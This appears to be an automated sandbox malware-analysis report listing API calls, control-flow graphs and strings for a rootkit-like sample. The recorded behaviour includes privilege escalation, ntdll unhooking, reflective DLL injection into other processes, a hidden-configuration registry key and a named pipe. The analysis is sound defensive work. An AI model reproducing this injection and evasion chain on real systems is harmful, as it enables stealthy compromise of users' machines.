                                                                                                                      • Opcode Fuzzy Hash: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
                                                                                                                      • Instruction Fuzzy Hash: D2F03071705B8183EB16CF57B98439A6661E78CBC1F489139FB8A43768DF38C485C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 147 140001f94-140001f9e 148 140001fa1-140001fb4 call 14000165c 147->148 151 140001fc1-140001fe6 ConnectNamedPipe 148->151 152 140001fb6-140001fbf 148->152 154 140001fef 151->154 152->148
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NamedPipe$ConnectCreate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2149227607-0
                                                                                                                      • Opcode ID: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
                                                                                                                      • Instruction ID: 32f579bea11482fe29c7866e40561744ab130bf1df4bedb027ae58d6efce7050
                                                                                                                      • Opcode Fuzzy Hash: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
                                                                                                                      • Instruction Fuzzy Hash: 5AF058B1204B4591EB16DF23F8143EA63A4AB8CBE0F588324BB6A436F4DF38C508C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:64%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:11.1%
                                                                                                                      Total number of Nodes:226
                                                                                                                      Total number of Limit Nodes:28
                                                                                                                      execution_graph 370 401f4d 373 401f5a 370->373 416 401dd3 373->416 377 401f70 378 401f7e 377->378 379 401dd3 16 API calls 377->379 440 401b33 GetCurrentProcessId OpenProcess 378->440 379->378 382 401f52 ExitProcess 383 401f9f SizeofResource 383->382 384 401fb4 LoadResource 383->384 384->382 385 401fc4 LockResource GetCurrentProcessId 384->385 447 4018a7 GetProcessHeap HeapAlloc 385->447 387 401fdf 454 401557 RegCreateKeyExW 387->454 390 402037 CreateThread GetProcessHeap HeapAlloc CreateThread 458 401377 GetProcessHeap HeapAlloc 390->458 563 402144 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 390->563 569 4021ed 390->569 391 401feb RegCreateKeyExW 392 402011 GetCurrentProcessId RegSetValueExW RegCloseKey 391->392 393 402032 RegCloseKey 391->393 392->393 393->390 396 4020a9 509 401288 396->509 397 402089 ShellExecuteW 397->396 397->397 399 4020ae 514 40112d GetProcessHeap HeapFree 399->514 401 4020b6 402 401288 6 API calls 401->402 403 4020be 402->403 404 401288 6 API calls 403->404 405 4020c6 404->405 406 401288 6 API calls 405->406 407 4020ce 406->407 408 40112d 4 API calls 407->408 409 4020d6 408->409 410 40112d 4 API calls 409->410 411 4020de 410->411 412 40112d 4 API calls 411->412 413 4020e6 412->413 414 4020ef GetProcessHeap HeapFree 413->414 415 4020fd Sleep 414->415 415->415 417 401de7 416->417 418 401f49 416->418 517 4019fa GetCurrentProcess IsWow64Process 417->517 437 401988 418->437 422 401e2c 423 401e36 GetCurrentProcess K32GetModuleInformation 422->423 424 401f42 FreeLibrary 423->424 425 401e53 CreateFileW 423->425 424->418 426 401f41 425->426 427 401e7d CreateFileMappingW 425->427 426->424 428 401e98 MapViewOfFile 427->428 429 401f3a CloseHandle 427->429 430 401f31 FindCloseChangeNotification 428->430 431 401eaf 428->431 429->426 430->429 431->430 432 401ec2 lstrcmpiA 431->432 435 401ef0 431->435 432->431 433 401ef2 VirtualProtect 432->433 519 401941 433->519 435->430 521 40196a 437->521 441 401bc0 FindResourceA 440->441 442 401b56 OpenProcessToken 440->442 441->382 441->383 443 401b67 LookupPrivilegeValueW 442->443 444 401bb9 FindCloseChangeNotification 442->444 443->444 445 401b7b AdjustTokenPrivileges 443->445 444->441 445->444 446 401bab GetLastError 445->446 446->444 523 4016fd GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 447->523 449 40192e GetProcessHeap HeapFree 449->387 450 401929 450->449 451 4018db 451->449 451->450 452 4018fc OpenProcess 451->452 452->451 453 40190f TerminateProcess CloseHandle 452->453 453->451 455 401581 ConvertStringSecurityDescriptorToSecurityDescriptorW 454->455 456 4015b6 454->456 455->456 457 4015a0 RegSetKeySecurity LocalFree 455->457 456->390 456->391 457->456 532 40115e GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 458->532 460 401399 533 401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 460->533 462 4013a0 534 40115e GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 462->534 464 4013a8 535 40115e GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 464->535 466 4013b0 536 40115e GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 466->536 468 4013b8 537 401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 468->537 470 4013c0 538 401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 470->538 472 4013c8 539 401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 472->539 474 4013d0 RegOpenKeyExW 475 401550 474->475 476 4013f7 RegOpenKeyExW 474->476 475->396 475->397 477 401415 476->477 478 401426 RegOpenKeyExW 476->478 547 40119b RegQueryInfoKeyW 477->547 480 40144f RegOpenKeyExW 478->480 481 40143f 478->481 482 401468 480->482 483 40147a RegOpenKeyExW 480->483 540 401036 RegQueryInfoKeyW 481->540 486 40119b 16 API calls 482->486 487 401493 483->487 488 4014a5 RegOpenKeyExW 483->488 490 401474 RegCloseKey 486->490 491 40119b 16 API calls 487->491 492 4014d0 RegOpenKeyExW 488->492 493 4014be 488->493 490->483 494 40149f RegCloseKey 491->494 496 4014f9 RegOpenKeyExW 492->496 497 4014e9 492->497 495 40119b 16 API calls 493->495 494->488 500 4014ca RegCloseKey 495->500 498 401522 RegOpenKeyExW 496->498 499 401512 496->499 501 401036 6 API calls 497->501 503 40154b RegCloseKey 498->503 504 40153b 498->504 502 401036 6 API calls 499->502 500->492 505 4014f4 RegCloseKey 501->505 506 40151d RegCloseKey 502->506 503->475 507 401036 6 API calls 504->507 505->496 506->498 508 401546 RegCloseKey 507->508 508->503 510 401299 GetProcessHeap HeapFree 509->510 511 4012af GetProcessHeap HeapFree 509->511 510->510 510->511 512 40196a 511->512 513 4012c6 GetProcessHeap HeapFree 512->513 513->399 515 40196a 514->515 516 40114b GetProcessHeap HeapFree 515->516 516->401 518 401a19 StrCpyW StrCatW GetModuleHandleW 517->518 518->418 518->422 520 401953 VirtualProtect 519->520 520->430 522 401978 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 521->522 522->377 524 401879 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 523->524 528 401765 523->528 524->451 525 401877 525->524 526 40177c OpenProcess 527 401796 K32EnumProcessModules 526->527 526->528 527->528 529 401866 FindCloseChangeNotification 527->529 528->525 528->526 528->529 530 4017c4 ReadProcessMemory 528->530 529->528 531 4017e3 530->531 531->528 531->530 532->460 533->462 534->464 535->466 536->468 537->470 538->472 539->474 541 401128 RegCloseKey 540->541 542 401068 540->542 541->480 542->541 543 401071 RegEnumValueW 542->543 544 4010a4 543->544 544->541 544->543 545 4010cc GetProcessHeap HeapAlloc 544->545 546 4010f7 GetProcessHeap HeapFree 544->546 545->544 546->544 548 401284 RegCloseKey 547->548 549 4011cc GetProcessHeap HeapAlloc 547->549 548->478 550 401273 GetProcessHeap HeapFree 549->550 551 4011eb RegEnumValueW 549->551 550->548 552 40121d 551->552 552->550 552->551 554 401246 StrCmpW 552->554 555 40123e StrCmpIW 552->555 556 4012d7 552->556 554->552 555->552 557 401373 556->557 558 4012ec 556->558 557->552 559 4012f7 GetProcessHeap HeapAlloc 558->559 560 401339 lstrlenW GetProcessHeap HeapAlloc StrCpyW 558->560 561 401941 559->561 560->557 562 401321 GetProcessHeap HeapFree 561->562 562->560 564 40217f K32EnumProcesses 563->564 565 4021e0 Sleep 564->565 567 402193 564->567 565->564 566 4021cd 566->565 567->566 579 402129 567->579 570 4021f4 569->570 572 402205 Sleep 570->572 573 40220f ConnectNamedPipe 570->573 630 401bc6 AllocateAndInitializeSid 570->630 572->570 574 402253 Sleep 573->574 575 40221c ReadFile 573->575 577 40225b DisconnectNamedPipe 574->577 576 402233 WriteFile 575->576 575->577 576->577 577->573 580 402140 579->580 581 402135 579->581 580->567 583 4015c1 581->583 605 401a24 583->605 586 4016f6 586->580 587 4015f8 OpenProcess 587->586 588 40160f NtQueryInformationProcess 587->588 589 401627 588->589 590 4016ef CloseHandle 588->590 589->590 613 401a9b OpenProcessToken 589->613 590->586 594 401657 594->590 595 401662 VirtualAllocEx 594->595 595->590 596 401678 WriteProcessMemory 595->596 596->590 597 40168b 596->597 627 401a7c GetModuleHandleA 597->627 599 4016aa NtCreateThreadEx 599->590 600 4016b0 599->600 600->590 601 4016bf WaitForSingleObject 600->601 604 4016bc FindCloseChangeNotification 600->604 603 4016cc GetExitCodeThread 601->603 601->604 603->604 604->590 606 4019fa 2 API calls 605->606 607 401a36 606->607 608 4015e7 607->608 609 401a3a OpenProcess 607->609 608->586 608->587 609->608 610 401a4d IsWow64Process 609->610 611 401a67 FindCloseChangeNotification 610->611 612 401a5c 610->612 611->608 612->611 614 401ab8 GetTokenInformation 613->614 615 40163a 613->615 616 401b25 CloseHandle 614->616 617 401acd GetLastError 614->617 615->590 623 401cd2 615->623 616->615 617->616 618 401ad8 LocalAlloc 617->618 619 401b24 618->619 620 401ae9 GetTokenInformation 618->620 619->616 621 401b00 GetSidSubAuthorityCount GetSidSubAuthority 620->621 622 401b1d LocalFree 620->622 621->622 622->619 624 401ce4 623->624 625 401d36 StrStrA 624->625 626 401d53 624->626 625->624 625->626 626->594 628 401a98 627->628 629 401a8b GetProcAddress 627->629 628->599 629->599 631 401c95 630->631 632 401bfc 630->632 631->570 633 401c06 SetEntriesInAclW 632->633 633->631 634 401c3d LocalAlloc 633->634 634->631 635 401c4d InitializeSecurityDescriptor 634->635 635->631 636 401c5a SetSecurityDescriptorDacl 635->636 636->631 637 401c6b CreateNamedPipeW 636->637 637->631 638 40210e 639 402125 638->639 640 40211a 638->640 641 4015c1 26 API calls 640->641 641->639

                                                                                                                      Callgraph

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,00401F85), ref: 00401B3D
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,?,?,?,00401F85), ref: 00401B4A
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,?,?,?,?,00401F85), ref: 00401B5D
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00401B71
                                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 00401BA1
                                                                                                                      • GetLastError.KERNEL32 ref: 00401BAB
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00401F85), ref: 00401BBA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$OpenToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 575374161-2896544425
                                                                                                                      • Opcode ID: a2f0ee75bb1a659cd0d3a2553357458e0cca49601e1686e4f397b873b149c109
                                                                                                                      • Instruction ID: 94f0b810e11bf8bc0d9ea5a63966bab554079aeeaeff7f5fb2edd46d5ef2bf77
                                                                                                                      • Opcode Fuzzy Hash: a2f0ee75bb1a659cd0d3a2553357458e0cca49601e1686e4f397b873b149c109
                                                                                                                      • Instruction Fuzzy Hash: 82011EB5A01219AFE7109FA59D89EAFBBBCEB04745F004075FA01F2295D774DF048BA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 163 4015c1-4015e9 call 401a24 166 4016f6-4016fc 163->166 167 4015ef-4015f2 163->167 167->166 168 4015f8-401609 OpenProcess 167->168 168->166 169 40160f-401621 NtQueryInformationProcess 168->169 170 401627-40162a 169->170 171 4016ef-4016f0 CloseHandle 169->171 170->171 172 401630-40163c call 401a9b 170->172 171->166 172->171 175 401642-401649 172->175 175->171 176 40164f-40165c call 401cd2 175->176 176->171 179 401662-401676 VirtualAllocEx 176->179 179->171 180 401678-401689 WriteProcessMemory 179->180 180->171 181 40168b-4016ae call 401a7c NtCreateThreadEx 180->181 181->171 184 4016b0-4016b5 181->184 184->171 185 4016b7-4016ba 184->185 186 4016bc-4016bd 185->186 187 4016bf-4016ca WaitForSingleObject 185->187 188 4016e8-4016e9 FindCloseChangeNotification 186->188 189 4016e5 187->189 190 4016cc-4016db GetExitCodeThread 187->190 188->171 189->188 190->189 191 4016dd-4016e2 190->191 191->189
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401A24: OpenProcess.KERNEL32(00001000,00000000,?,?,?,00000000,?,?,004015E7), ref: 00401A41
                                                                                                                        • Part of subcall function 00401A24: IsWow64Process.KERNEL32(00000000,?,?,004015E7), ref: 00401A52
                                                                                                                        • Part of subcall function 00401A24: FindCloseChangeNotification.KERNELBASE(00000000,?,004015E7), ref: 00401A68
                                                                                                                      • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 004015FF
                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,0000001D,?,00000004,00000000), ref: 00401619
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004016F0
                                                                                                                        • Part of subcall function 00401A9B: OpenProcessToken.ADVAPI32(00000000,00000008,?,?), ref: 00401AAE
                                                                                                                        • Part of subcall function 00401A9B: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00401AC3
                                                                                                                        • Part of subcall function 00401A9B: GetLastError.KERNEL32 ref: 00401ACD
                                                                                                                        • Part of subcall function 00401A9B: LocalAlloc.KERNEL32(00000000,?,00000000), ref: 00401ADD
                                                                                                                        • Part of subcall function 00401A9B: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00401AF6
                                                                                                                        • Part of subcall function 00401A9B: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00401B02
                                                                                                                        • Part of subcall function 00401A9B: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00401B0F
                                                                                                                        • Part of subcall function 00401A9B: LocalFree.KERNEL32(00000000), ref: 00401B1E
                                                                                                                        • Part of subcall function 00401A9B: CloseHandle.KERNEL32(?), ref: 00401B28
                                                                                                                        • Part of subcall function 00401CD2: StrStrA.SHLWAPI(00000000,ReflectiveDllMain), ref: 00401D39
                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00003000,00000040), ref: 0040166C
                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401681
                                                                                                                        • Part of subcall function 00401A7C: GetModuleHandleA.KERNEL32(ntdll.dll,004016AA,?,001FFFFF,00000000,00000000,00002000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401A81
                                                                                                                        • Part of subcall function 00401A7C: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401A91
                                                                                                                      • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,00000000,00002000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004016AA
                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 004016C2
                                                                                                                      • GetExitCodeThread.KERNEL32(?,?), ref: 004016D3
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 004016E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Close$HandleInformationOpenToken$AllocAuthorityChangeFindLocalNotificationThread$AddressCodeCountCreateErrorExitFreeLastMemoryModuleObjectProcQuerySingleVirtualWaitWow64Write
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2389754940-0
                                                                                                                      • Opcode ID: 8d352eb32a48a557f2ff996115c836c9804492d69efe05eb0cb64db553f73f09
                                                                                                                      • Instruction ID: 951545e82e6dc0c965935b179c794656d07d6bb01e9cf9b4bfb8f24a082405a0
                                                                                                                      • Opcode Fuzzy Hash: 8d352eb32a48a557f2ff996115c836c9804492d69efe05eb0cb64db553f73f09
                                                                                                                      • Instruction Fuzzy Hash: 93312571A01219BBDB109FE5CD84AAF7ABDAF44749F14457AF600F22A0D775DE00CA68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 202 401bc6-401bf6 AllocateAndInitializeSid 203 401c95 202->203 204 401bfc-401c3b call 40196a SetEntriesInAclW 202->204 206 401c98-401c9c 203->206 204->203 208 401c3d-401c4b LocalAlloc 204->208 208->203 209 401c4d-401c58 InitializeSecurityDescriptor 208->209 209->203 210 401c5a-401c69 SetSecurityDescriptorDacl 209->210 210->203 211 401c6b-401c93 CreateNamedPipeW 210->211 211->206
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEE
                                                                                                                      • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,004021FE), ref: 00401C33
                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000014), ref: 00401C41
                                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00401C50
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,004021FE,00000000), ref: 00401C61
                                                                                                                      • CreateNamedPipeW.KERNELBASE(\\.\pipe\$sxrchildproc34226543a32,00000003,00000000,000000FF,00000400,00000400,00000000,?), ref: 00401C8D
                                                                                                                      Strings
                                                                                                                      • \\.\pipe\$sxrchildproc34226543a32, xrefs: 00401C89
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                      • String ID: \\.\pipe\$sxrchildproc34226543a32
                                                                                                                      • API String ID: 3197395349-4098291161
                                                                                                                      • Opcode ID: 969633bd7e0c345e5ba63a4ff6d283e29e8a6149993329581a75ca672ae4c306
                                                                                                                      • Instruction ID: 2580ba7714949e4ab5af2f6201017f93077f831f3c2deb1848648c4242cdec54
                                                                                                                      • Opcode Fuzzy Hash: 969633bd7e0c345e5ba63a4ff6d283e29e8a6149993329581a75ca672ae4c306
                                                                                                                      • Instruction Fuzzy Hash: 602112B0941209BAEB119F95DD89BFFBBBCEF04755F10002AF615F62D4D7B48A048A64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000020,74DF2E90,74DF0F10,74DEF380,?,?,?,?,?,0040207F), ref: 00401385
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040138C
                                                                                                                        • Part of subcall function 0040115E: GetProcessHeap.KERNEL32(00000000,00000010,00000000,00401399,?,?,?,?,?,0040207F), ref: 00401163
                                                                                                                        • Part of subcall function 0040115E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040116A
                                                                                                                        • Part of subcall function 0040115E: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401187
                                                                                                                        • Part of subcall function 0040115E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040118E
                                                                                                                        • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,0000000C,00000000,004013A0,?,?,?,?,?,0040207F), ref: 00401005
                                                                                                                        • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040100C
                                                                                                                        • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401022
                                                                                                                        • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 00401029
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,00000000,00020119,?,?,?,?,?,?,0040207F), ref: 004013ED
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,startup,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 00401409
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 00401424
                                                                                                                        • Part of subcall function 00401036: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00401546,00000000,00000000,00000000,00000000,75A8EB20,00000000,75A8E9B0), ref: 0040105A
                                                                                                                        • Part of subcall function 00401036: RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,?,?), ref: 0040109A
                                                                                                                        • Part of subcall function 00401036: GetProcessHeap.KERNEL32(00000000,00402119), ref: 004010D8
                                                                                                                        • Part of subcall function 00401036: HeapAlloc.KERNEL32(00000000), ref: 004010DF
                                                                                                                        • Part of subcall function 00401036: GetProcessHeap.KERNEL32(00000000,?), ref: 00401101
                                                                                                                        • Part of subcall function 00401036: HeapFree.KERNEL32(00000000), ref: 00401108
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,pid,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 00401439
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,0040207F), ref: 0040144D
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,process_names,00000000,00020019,0040207F,?,?,?,?,?,0040207F), ref: 00401462
                                                                                                                      • RegCloseKey.ADVAPI32(0040207F,?,?,?,?,?,0040207F), ref: 00401478
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,paths,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 0040148D
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 004014A3
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,service_names,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 004014B8
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 004014CE
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,tcp_local,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 004014E3
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 004014F7
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,tcp_remote,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 0040150C
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 00401520
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,udp,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 00401535
                                                                                                                        • Part of subcall function 0040119B: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,004014CA,00000000,00000000,00000000,00000000,75A8EB20,75A8E9B0), ref: 004011BE
                                                                                                                        • Part of subcall function 0040119B: GetProcessHeap.KERNEL32(00000000,0000020A,00000000), ref: 004011D3
                                                                                                                        • Part of subcall function 0040119B: HeapAlloc.KERNEL32(00000000), ref: 004011DA
                                                                                                                        • Part of subcall function 0040119B: RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,00000000,?), ref: 00401213
                                                                                                                        • Part of subcall function 0040119B: StrCmpIW.SHLWAPI(?,00000000), ref: 0040123E
                                                                                                                        • Part of subcall function 0040119B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401276
                                                                                                                        • Part of subcall function 0040119B: HeapFree.KERNEL32(00000000), ref: 0040127D
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 00401549
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 0040154E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValue
                                                                                                                      • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                      • API String ID: 3905038499-3028563969
                                                                                                                      • Opcode ID: 056b190c5a7003305b402996033ed08d2b60a17da93c4cead7c632d3eea7e6b4
                                                                                                                      • Instruction ID: 80582fa020228838d9679a14cc1c1ce867473cb0a533c3b95f3244a6952cd940
                                                                                                                      • Opcode Fuzzy Hash: 056b190c5a7003305b402996033ed08d2b60a17da93c4cead7c632d3eea7e6b4
                                                                                                                      • Instruction Fuzzy Hash: 47514271A00309BBDB20AFA5DC42FAFB7B9AF48744F10013AF501BA1E5D675AE009B58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401DD3: StrCpyW.SHLWAPI ref: 00401E03
                                                                                                                        • Part of subcall function 00401DD3: StrCatW.SHLWAPI ref: 00401E12
                                                                                                                        • Part of subcall function 00401DD3: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00401E19
                                                                                                                        • Part of subcall function 00401DD3: GetCurrentProcess.KERNEL32(00000000,?,0000000C), ref: 00401E3E
                                                                                                                        • Part of subcall function 00401DD3: K32GetModuleInformation.KERNEL32(00000000), ref: 00401E45
                                                                                                                        • Part of subcall function 00401DD3: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401E69
                                                                                                                        • Part of subcall function 00401DD3: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000), ref: 00401E87
                                                                                                                        • Part of subcall function 00401DD3: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 00401E9E
                                                                                                                        • Part of subcall function 00401DD3: lstrcmpiA.KERNEL32(00401F6B,.text), ref: 00401EDC
                                                                                                                        • Part of subcall function 00401DD3: FindCloseChangeNotification.KERNELBASE(?), ref: 00401F34
                                                                                                                        • Part of subcall function 00401988: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 004019D6
                                                                                                                        • Part of subcall function 00401988: VerSetConditionMask.NTDLL(00000000), ref: 004019DA
                                                                                                                        • Part of subcall function 00401988: VerSetConditionMask.NTDLL(00000000), ref: 004019DE
                                                                                                                        • Part of subcall function 00401988: VerifyVersionInfoW.KERNEL32 ref: 004019EB
                                                                                                                      • FindResourceA.KERNEL32(00000000,00000065,DLL), ref: 00401F8F
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401FA1
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401FB6
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FC5
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401FD6
                                                                                                                      • RegCreateKeyExW.KERNELBASE(?,pid,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402001
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00402011
                                                                                                                      • RegSetValueExW.KERNELBASE(?,svc32,00000000,00000004,?,00000004), ref: 00402027
                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00402030
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402035
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,004021ED,0040210E,00000000,00000000), ref: 0040204B
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000008), ref: 00402056
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00402059
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,00402144,00000000,00000000,00000000), ref: 00402078
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 0040209C
                                                                                                                        • Part of subcall function 00401DD3: VirtualProtect.KERNEL32(?,32F4B90A,00000040,?), ref: 00401F0C
